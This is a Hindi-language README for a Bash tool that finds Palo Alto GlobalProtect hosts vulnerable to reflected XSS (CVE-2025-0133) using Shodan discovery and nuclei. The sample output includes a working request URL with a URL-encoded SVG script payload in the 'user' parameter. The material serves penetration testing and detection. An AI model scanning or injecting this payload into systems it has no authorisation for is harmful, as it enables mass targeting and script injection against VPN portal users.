
Palo Alto GlobalProtect Gateway & Portal में रिफ्लेक्टेड XSS कमजोरी पाई गई। हमलावर तैयार अनुरोधों के माध्यम से दुर्भावनापूर्ण स्क्रिप्ट इंजेक्ट कर सकते हैं।
CVE-2025-0133 रिफ्लेक्टेड XSS भेद्यता का पता लगाने के लिए Palo Alto GlobalProtect Gateway & Portal में एक Bash-आधारित स्वचालित स्कैनर उपकरण जो nuclei और shodanx का उपयोग करता है।
लेखक:
तिथि: 2025-06-23
गंभीरता: मध्यम
CVE ID: CVE-2025-0133
भेद्यता प्रकार: रिफ्लेक्टेड क्रॉस-साइट स्क्रिप्टिंग (XSS)
परीक्षित: Palo Alto Networks GlobalProtect Portal (PAN-OS)
यह उपकरण पेनिट्रेशन टेस्टर और सुरक्षा शोधकर्ताओं को CVE-2025-0133 समस्या से संबंधित कमजोर डोमेन या IP की तुरंत पहचान करने में मदद करता है।
यह nuclei टेम्पलेट और Shodan क्वेरी एकीकरण (shodanx) का लाभ उठाकर लक्ष्यों को कुशलतापूर्वक खोजने और स्कैन करता है।
shodanx चलाता हैnuclei का उपयोग करके लक्ष्यों को स्कैन करता है.txt और .json दोनों प्रारूपों में सहेजने का संकेत देता है$PATH में nuclei स्थापित और सुलभCVE-2025-0133 nuclei टेम्पलेट फ़ाइल यहाँ स्थित:/home/user/nuclei-templates/http/cves/2025/CVE-2025-0133.yaml (आवश्यकतानुसार पथ अपडेट करें)pip install git+https://github.com/RevoltSecurities/ShodanX
यदि त्रुटि दिखे: "error: externally-managed-environment"
pip install git+https://github.com/RevoltSecurities/ShodanX --break-system-packages
⚠️ नोट: कुछ सिस्टमों (विशेषकर Debian/Ubuntu) पर
--break-system-packagesविकल्प की आवश्यकता होती है ताकि pip बिना अनुमति त्रुटि के वर्चुअल वातावरण के बाहर पैकेज स्थापित कर सके।
👉 सुनिश्चित करें कि shodanx आपके $PATH में उपलब्ध है।
आप इसे इसके साथ परीक्षण कर सकते हैं:
shodanx -h
go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest
जाँचें कि क्या स्थापित हुआ:
nuclei -version
फिर टेम्पलेट अपडेट करें:
nuclei -update-templates
┌──(user㉿administrator)-[~]
└─$ ./cve20250133.sh -h
Usage: ./cve20250133.sh <domain-or-file>
Scan CVE-2025-0133 vulnerabilities using nuclei and shodanx.
If input is a file, scan domains/IPs from the file.
If input is a domain, run shodanx to find related IPs/domains and scan them.
Options:
-h, --help, help Show this help message and exit.
┌──(user㉿administrator)-[~]
└─$ ./cve20250133.sh domain.com
Scan Start Time: 2025-06-24 16:33:51
▄▖▖▖▄▖ ▄▖▄▖▄▖▄▖ ▄▖▗ ▄▖▄▖
▌ ▌▌▙▖▄▖▄▌▛▌▄▌▙▖▄▖▛▌▜ ▄▌▄▌
▙▖▚▘▙▖ ▙▖█▌▙▖▄▌ █▌▟▖▄▌▄▌
-INTELEON404
[✔] Input is a single domain: domain.com — Running ShodanX first
_ _
| | | (_\ /
, | | __ __| __, _ _ \/
/ \_|/ \ / \_/ | / | / |/ | /\
\/ | |_/\__/ \_/|_/\_/|_/ | |_/ _/ \_/
- RevoltSecurities
[version]:shodanx current version v1.1.1 (latest)
[*] Scanning domain 123.45.67.890...
__ _
____ __ _______/ /__ (_)
/ __ \/ / / / ___/ / _ \/ /
/ / / / /_/ / /__/ / __/ /
/_/ /_/\__,_/\___/_/\___/_/ v3.4.5
projectdiscovery.io
[INF] Current nuclei version: v3.4.5 (latest)
[INF] Current nuclei-templates version: v10.2.3 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 105
[INF] Templates loaded for current scan: 1
[INF] Executing 1 signed templates from projectdiscovery/nuclei-templates
[INF] Targets loaded for current scan: 1
[INF] Running httpx on input host
[INF] Found 1 URL from httpx
[INF] Scan completed in 850.496188ms. 1 matches found.
[CVE-2025-0133] [http] [medium] https://123.45.67.890/ssl-vpn/getconfig.esp?client-type=1&protocol-version=p1&app-version=3.0.1-10&clientos=Linux&os-version=linux-64&hmac-algo=sha1%2Cmd5&enc-algo=aes-128-cbc%2Caes-256-cbc&authcookie=12cea70227d3aafbf25082fac1b6f51d&portal=us-vpn-gw-N&user=%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%3Cscript%3Eprompt%28%22XSS%22%29%3C%2Fscript%3E%3C%2Fsvg%3E&domain=%28empty_domain%29&computer=computer
------------------------------------------------------
┌──(user㉿administrator)-[~]
└─$ ./cve20250133.sh file.txt
Scan Start Time: 2025-06-24 16:36:37
▄▖▖▖▄▖ ▄▖▄▖▄▖▄▖ ▄▖▗ ▄▖▄▖
▌ ▌▌▙▖▄▖▄▌▛▌▄▌▙▖▄▖▛▌▜ ▄▌▄▌
▙▖▚▘▙▖ ▙▖█▌▙▖▄▌ █▌▟▖▄▌▄▌
-INTELEON404
[✔] Input is a file: file.txt — Skipping ShodanX
[*] Scanning domain 123.45.67.890 ...
__ _
____ __ _______/ /__ (_)
/ __ \/ / / / ___/ / _ \/ /
/ / / / /_/ / /__/ / __/ /
/_/ /_/\__,_/\___/_/\___/_/ v3.4.5
projectdiscovery.io
[INF] Current nuclei version: v3.4.5 (latest)
[INF] Current nuclei-templates version: v10.2.3 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 105
[INF] Templates loaded for current scan: 1
[INF] Executing 1 signed templates from projectdiscovery/nuclei-templates
[INF] Targets loaded for current scan: 1
[INF] Running httpx on input host
[INF] Found 1 URL from httpx
[INF] Scan completed in 28.825193ms. 1 matches found.
[CVE-2025-0133] [http] [medium] https://123.45.67.890/ssl-vpn/getconfig.esp?client-type=1&protocol-version=p1&app-version=3.0.1-10&clientos=Linux&os-version=linux-64&hmac-algo=sha1%2Cmd5&enc-algo=aes-128-cbc%2Caes-256-cbc&authcookie=12cea70227d3aafbf25082fac1b6f51d&portal=us-vpn-gw-N&user=%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%3Cscript%3Eprompt%28%22XSS%22%29%3C%2Fscript%3E%3C%2Fsvg%3E&domain=%28empty_domain%29&computer=computer
------------------------------------------------------
Palo Alto GlobalProtect Gateway & Portal में रिफ्लेक्टेड क्रॉस-साइट स्क्रिप्टिंग (XSS) भेद्यता जो हमलावरों को तैयार अनुरोधों के माध्यम से दुर्भावनापूर्ण स्क्रिप्ट इंजेक्ट करने की अनुमति देती है। इस समस्या को कम करने के लिए अपने सिस्टम को नवीनतम Palo Alto Networks रिलीज़ में अपडेट करें।
यह प्रोजेक्ट MIT लाइसेंस के अंतर्गत लाइसेंस प्राप्त है - विवरण के लिए LICENSE फ़ाइल देखें।